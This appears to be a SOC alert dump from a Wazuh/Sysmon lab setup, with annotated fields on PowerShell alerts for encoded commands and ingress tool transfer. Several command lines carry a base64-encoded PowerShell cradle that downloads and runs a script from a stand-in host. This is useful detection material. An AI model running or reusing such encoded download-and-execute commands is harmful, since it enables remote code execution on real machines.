data.win.eventdata.parentProcessId:  13524
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:52.400+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:52.400+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534212.920705
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:39.8247444Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282076
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:39.810 ProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} ProcessId: 12600 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dqe4bdg3.md4.ps1 CreationUtcTime: 2025-04-24 22:35:39.810 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:39.810
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcba-680a-a30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dqe4bdg3.md4.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:39.810
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.027+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.027+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.923473
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:42.1700560Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282122
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:40.387 ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} ProcessId: 8756 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcba-680a-a30a-000000000e00} ParentProcessId: 12600 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:40.387
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbc-680a-a70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8756
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcba-680a-a30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12600
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.045+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.045+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.931539
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:42.3980110Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282123
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:42.368 ProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} ProcessId: 8756 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_p2lp1iym.vuq.ps1 CreationUtcTime: 2025-04-24 22:35:42.368 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:42.368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbc-680a-a70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8756
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_p2lp1iym.vuq.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:42.368
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:53.717+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:53.717+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534213.934303
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:44.7172103Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282169
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:43.049 ProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} ProcessId: 11892 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcbc-680a-a70a-000000000e00} ParentProcessId: 8756 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:43.049
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcbf-680a-a90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcbc-680a-a70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8756
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

